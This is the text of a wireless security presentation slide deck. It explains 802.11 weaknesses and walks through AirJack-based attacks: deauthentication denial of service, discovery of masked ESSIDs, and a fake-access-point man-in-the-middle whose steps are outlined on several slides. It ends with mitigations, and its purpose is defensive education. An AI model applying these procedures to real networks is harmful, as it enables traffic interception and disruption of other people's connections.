Wireless Security, Advanced Wireless LAN HackingAdvanced 802.11 Attack Wireless Best Practices Wireless Hacking Tools wlan-jack, essid-jack, monkey-jack, kracker-jack Network Stumbler M
Trang 1Wireless Security
Mark NakropManaging DirectornForce Security Systems
Trang 2Wireless Security, Advanced Wireless LAN Hacking
Advanced 802.11 Attack Wireless Best Practices Wireless Hacking Tools wlan-jack, essid-jack, monkey-jack, kracker-jack Network Stumbler
Mitigation Strategies
Agenda
Trang 3Conventional LAN Security Model
C o r p o r a t e F i r e w a l l
I n t e r n e t
Firewall shields inside from outside.
Trang 4Attacks can happen over air Attacks bypass the firewall.
Internet
Corporate Firewall
Network not confined to wires/premises anymore.
Trang 5Threats from Unmanaged Devices
Common
Rogue Access Points
Ent erp
rise Ne two rk
Nei ghb orin g N
AP MAC Spoofing Rogue AP
Mis-configured
AP
Unauthorized Association Mis-association
Honeypot
Mis-configured Access Points
Denial of Service
De-authentication flood Packet storm
MAC Spoofing APs
Malicious
Honeypot APs
Unauthorized associations Client mis-associations
Ad hoc connections
Trang 6Goals of WLAN Security
Fortify authorized communication
Access control and encryption over wireless link
WEP WPA 802.11i adequately address this problem
Protect the network from unmanaged devices
Rogue APs, DoS attacks, client misassociations, Honeypots, ad hoc networks, MAC spoofing etc.
Current pain point in enterprise network
Wireless Intrusion Detection and Prevention Systems
Trang 7802.11, 802.11b, etc.
IEEE standard – based on well known Ethernet standards
802.11 – FHSS or DSSS, WEP, 2.4 GHz, Infrastructure (BSS) or Ad-Hoc (iBSS)
Limited to 2Mb/s due to FCC limits on dwell times per frequency hop
802.11b – DSSS only, WEP, 2.4 GHz, Infrastructure or Ad-Hoc
Up to 11Mb/s
Also known as Wi-Fi
802.11a and 802.11g
Trang 8Low level DoS is hard to prevent
Like any other environment, there are no silver bullets
Trang 9Current Security Practices
WEP –Wired Equivalent Privacy
Link Level
Very Broken
Firewalls/MAC Filtering
Reactionary – IDS/Active Portal
Higher level protocols
Trang 10Thoughts on WEP
Key management beyond a handful of people is impossible
Too much trust
Difficult administration
Key lifetime can get very short in an enterprise
No authentication for management frames
No per packet auth
False Advertising!!!
Trang 11What is Lacking?
Scalability
Many clients
Large networks
Protection for all parties
Eliminate invalid trust assumptions
Trang 12What is War Driving.?
Equipped with wireless devices and related tools, and driving around in a
vehicle or parking at interesting places with a goal of discovering into wireless networks is known as war driving War-drivers define war driving
easy-to-get-as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers
Trang 13What is War Chalking.?
War chalking is the practice of marking sidewalks and walls with special symbols to indicate that wireless access is nearby so that others do not need to go through the trouble of the same
discovery
Trang 14What Will Be Covered
Wireless network best practices
Practical attacks
The focus of the attack(s)
The network layers
The bottom 2 layers
Custom (forged) 802.11b management frames
The Tool Box
Drivers
Utilities
Proof of concept code
Trang 15What Will Be Covered
Attack Scenarios
Denial of service
Masked ESSID detection
802.11b layer MITM attack
Inadequate VPN implementations
Mitigation Strategies
Trang 16Wireless Best Practices
Enable WEP - Wired equivalent privacy
Key rotation when equipment supports it
Disable broadcast of ESSID
Block null ESSID connection
Restrict access by MAC address
Use VPN technology
Use strong mutual authentication
Trang 17Practical Attacks
WEP – Can be cracked passively
Masked ESSID – Can be passively observed in management frames during association
Block null ESSID connects – Same problem
Install VPN – Weakly authenticated VPN is susceptible to active attack (MITM)
Strong mutual authentication - ?
Trang 18The Tool Box
Custom Drivers
Air-Jack
Custom driver for PrismII (HFA384x) cards
MAC address setting/spoofing
Send custom (forged) management frames
Trang 19Attack Scenarios – WLAN-Jack
Trang 20Attack Scenarios – WLAN-Jack
Airopeek Trace
Trang 21Attack Scenarios – WLAN-Jack
Airopeek Trace
Trang 22Attack Scenarios – WLAN-Jack
Decode of Deauthentication Frame
Trang 23Attack Scenarios – WLAN-Jack
This is your connection
Trang 24Attack Scenarios – WLAN-Jack
This is your connection on Jack
Trang 25WLAN-Attack Scenarios – ESSID-Jack
Is the ESSID a shared secret?
If I mask the ESSID from the AP beacons then unauthorized
users will not be able to associate with my AP?
Discover Masked ESSID
Send a deauthenticate frame to the broadcast address
Obtain ESSID contained in client probe request or AP probe response.
Trang 26Attack Scenarios – ESSID-Jack
Trang 27Attack Scenarios - ESSID-Jack
Airopeek Trace
Trang 28Attack Scenarios – ESSID-Jack
Airopeek Trace
Trang 29Attack Scenarios – Monkey-Jack
MITM Attack
Taking over connections at layer 1 and 2
Insert attack machine between victim and access point
Management frames
Deauthenticate victim from real AP
Send deauthenticate frames to the victim using the access point’s MAC address as the source
Trang 30Attack Scenarios – Monkey-Jack
Victim’s 802.11 card scans channels to search for new AP
Victim’s 802.11 card associates with fake AP on the attack machine
Fake AP is on a different channel than the real one
Attack machine’s fake AP is duplicating MAC address and ESSID
of real AP
Attack machine associates with real AP
Attack machine duplicates MAC address of the victim’s machine
.
Attack machine is now inserted and can pass frames through in a manner that
is transparent to the upper level protocols
Trang 31Attack Scenarios – Monkey-Jack
Before Monkey-Jack
Trang 32Attack Scenarios Monkey-Jack
After Monkey-Jack
Trang 33Attack Scenarios - Monkey-Jack
Trang 35NetStumbler
Trang 36Airopeek
Trang 37Mitigation Strategies
Wireless IDS and Monitoring
VPN + Strong mutual authentication
RF Signal shaping – Avoiding signal leaks
Antennas with directional radiation pattern
Trang 38Wi-Fi Intrusion Detection and Prevention
Ent erp rise Ne two rk
AP MAC Spoofing Rogue AP
Mis-configured AP
Unauthorized Association Mis-association
Honeypot Mis-association
Trang 39Wireless networks are more susceptible to active attacks than wired networksEnable all built-in security capabilities
Use VPN with strong mutual authentication
Monitor wireless network medium (air space) for suspicious activity
Trang 40DON’T GET DISCOURAGED!
Attackers are constantly improving their skills
The security community must strive to improve as well
Keeping up is a lot of work
But it can be fun, and does help ensure job security
Experiment in your Hacker Analysis Laboratory
By remaining diligent,
you can defend
your computer systems!
Trang 41THANK YOU